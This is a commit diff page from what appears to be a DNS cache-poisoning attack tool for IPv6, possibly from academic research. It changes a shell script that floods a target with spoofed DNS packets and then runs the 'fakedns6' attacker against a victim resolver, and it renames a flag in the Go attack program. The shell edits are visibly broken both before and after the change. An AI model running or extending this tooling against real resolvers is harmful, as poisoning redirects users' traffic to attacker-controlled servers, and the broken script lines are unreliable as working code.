summaryrefslogtreecommitdiff
diff options
context:
space:
mode:
-rw-r--r--dns_query.sh2
-rw-r--r--src/ucr.edu/fakedns6/attack.go2
2 files changed, 2 insertions, 2 deletions
diff --git a/dns_query.sh b/dns_query.sh
index d8387de..1528df1 100644
--- a/dns_query.sh
+++ b/dns_query.sh
@@ -18,7 +18,7 @@ cat txid.bin dns_start.bin dns_mid.bin dns_end.bin dns_OPT.bin > dns.bin
# fire!
echo "fire"
udp6 -d $1 -a 53 -Z dns.bin -r 50pps -s $2
-a=$RANDOM % 10
+a=$($RANDOM % 10)
echo $a
if a -gt 8; then
./fakedns6 -a $5 -b $1 -i $3 -n $4 -r $1 -t 50000 -at $2 -tg 0 -s 10000 -e 65000 -j 0 -f 1 >/dev/null 2>&1
diff --git a/src/ucr.edu/fakedns6/attack.go b/src/ucr.edu/fakedns6/attack.go
index d72cc9a..435d07d 100644
--- a/src/ucr.edu/fakedns6/attack.go
+++ b/src/ucr.edu/fakedns6/attack.go
@@ -458,7 +458,7 @@ func main() {
soaName := flag.String("soa", "", "SOA name of the victim domain on attacker-controlled name server used to indicate the resolver has been poisoned. (Resolver attack only.)")
//特殊用途
- isfake := flag.String("f", "0", "")
+ isfake := flag.String("F", "0", "")
flag.Parse()
//gatewayMac, _ := net.ParseMAC(*gateWayMacStr)
Main(*ifaceName, net.ParseIP(*authServer), net.ParseIP(*resolver), net.ParseIP(*resolverBackend), *startPort, *endPort, *victimDNSName, *dnsQueryTmeout, *defaultJitter,